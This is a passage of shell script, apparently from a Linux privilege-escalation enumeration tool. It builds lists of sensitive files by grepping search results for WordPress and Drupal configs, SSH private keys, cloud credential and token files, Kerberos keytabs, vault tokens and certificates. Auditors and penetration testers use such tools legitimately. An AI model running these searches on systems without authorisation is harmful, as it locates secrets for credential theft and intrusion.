"$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*' | grep -E "^/var|^/private|^/mnt|^/tmp" | grep -E "sess_.*$" | sort | uniq | head -n 70) - PSTORAGE_PHP_FILES=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*config.*\.php$|database\.php$|db\.php$|storage\.php$|settings\.php$" | sort | uniq | head -n 70) - PSTORAGE_WORDPRESS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "wp-config\.php$" | sort | uniq | head -n 70) - PSTORAGE_DRUPAL=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E '/default/settings.php' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "settings\.php$" | sort | uniq | head -n 70) - PSTORAGE_MOODLE=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E 'moodle/config.php' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "config\.php$" | sort | uniq | head -n 70) - PSTORAGE_TOMCAT=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "tomcat-users\.xml$" | sort | uniq | head -n 70) - PSTORAGE_MONGO=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "mongod.*\.conf$" | sort | uniq | head -n 70) - PSTORAGE_SUPERVISORD=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "supervisord\.conf$" | sort | uniq | head -n 70) - PSTORAGE_CESI=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "cesi\.conf$" | sort | uniq | head -n 70) - PSTORAGE_RSYNC=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "rsyncd\.conf$|rsyncd\.secrets$" | sort | uniq | head -n 70) - PSTORAGE_HOSTAPD=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "hostapd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_ANACONDA_KS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "anaconda-ks\.cfg$" | sort | uniq | head -n 70) - PSTORAGE_RACOON=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "racoon\.conf$|psk\.txt$" | sort | uniq | head -n 70) - PSTORAGE_VNC=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.vnc$|.*vnc.*\.c.*nf.*$|.*vnc.*\.ini$|.*vnc.*\.txt$|.*vnc.*\.xml$" | sort | uniq | head -n 70) - PSTORAGE_LDAP=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "ldap$" | sort | uniq | head -n 70) - PSTORAGE_OPENVPN=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.ovpn$" | sort | uniq | head -n 70) - PSTORAGE_SSH=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "id_dsa.*$|id_rsa.*$|known_hosts$|authorized_hosts$|authorized_keys$" | sort | uniq | head -n 70) - PSTORAGE_CERTSB4=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib.*' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.pem$|.*\.cer$|.*\.crt$" | sort | uniq | head -n 70) - PSTORAGE_CERTSBIN=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.csr$|.*\.der$" | sort | uniq | head -n 70) - PSTORAGE_CERTSCLIENT=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.pfx$|.*\.p12$" | sort | uniq | head -n 70) - PSTORAGE_SSH_AGENTS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/private|^/tmp" | grep -E "agent.*$" | sort | uniq | head -n 70) - PSTORAGE_SSH_CONFIG=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/usr|^$GREPHOMESEARCH" | grep -E "ssh.*config$" | sort | uniq | head -n 70) - PSTORAGE_CLOUD_CREDENTIALS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "credentials$|credentials\.db$|legacy_credentials\.db$|access_tokens\.db$|access_tokens\.json$|accessTokens\.json$|azureProfile\.json$|TokenCache\.dat$|AzureRMContext\.json$|\.bluemix$" | sort | uniq | head -n 70) - PSTORAGE_KERBEROS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "krb5\.conf$|krb5\.keytab$|\.k5login$|kadm5\.acl$|secrets\.ldb$|\.secrets\.mkey$|sssd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_KIBANA=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "kibana\.y.*ml$" | sort | uniq | head -n 70) - PSTORAGE_KNOCKD=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E '/etc/init.d/' | grep -E "^/etc" | grep -E ".*knockd.*$" | sort | uniq | head -n 70) - PSTORAGE_LOGSTASH=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "logstash$" | sort | uniq | head -n 70) - PSTORAGE_ELASTICSEARCH=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "elasticsearch\.y.*ml$" | sort | uniq | head -n 70) - PSTORAGE_VAULT_SSH_HELPER=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "vault-ssh-helper\.hcl$" | sort | uniq | head -n 70) - PSTORAGE_VAULT_SSH_TOKEN=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.vault-token$" | sort | uniq | head -n 70) - PSTORAGE_COUCHDB=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "couchdb$" | sort | uniq | head -n 70) - PSTORAGE_REDIS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "redis\.conf$" | sort | uniq | head -n 70) - PSTORAGE_MOSQUITTO=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "mosquitto\.conf$" | sort | uniq | head -n 70) - PSTORAGE_NEO4J=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "neo4j$" | sort | uniq | head -n 70) - PSTORAGE_CLOUD_INIT=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "cloud\.cfg$" | sort | uniq | head -n 70) - PSTORAGE_ERLANG=$(echo -e 